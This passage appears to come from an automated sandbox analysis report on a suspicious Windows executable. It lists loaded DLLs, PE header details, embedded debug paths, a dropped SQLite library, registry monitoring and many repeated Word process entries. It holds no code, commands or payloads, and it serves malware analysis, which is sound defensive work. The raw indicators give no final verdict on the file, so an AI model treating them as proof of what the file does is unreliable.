      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: e_sqlite3.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: hJ1bl8p7dJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: hJ1bl8p7dJ.exeStatic file information: File size 26345984 > 1048576
      Source: hJ1bl8p7dJ.exeStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x82f600
      Source: hJ1bl8p7dJ.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfb0000
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: hJ1bl8p7dJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: hJ1bl8p7dJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: hJ1bl8p7dJ.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: hJ1bl8p7dJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: hJ1bl8p7dJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: hJ1bl8p7dJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: hJ1bl8p7dJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: hJ1bl8p7dJ.exeStatic PE information: section name: .managed
      Source: hJ1bl8p7dJ.exeStatic PE information: section name: hydrated
      Source: e_sqlite3.dll.0.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1ACC82 push rbx; retn 000Ah0_2_00007FFEEE1ACC89
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile created: C:\Users\user\Desktop\e_sqlite3.dllJump to dropped file
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
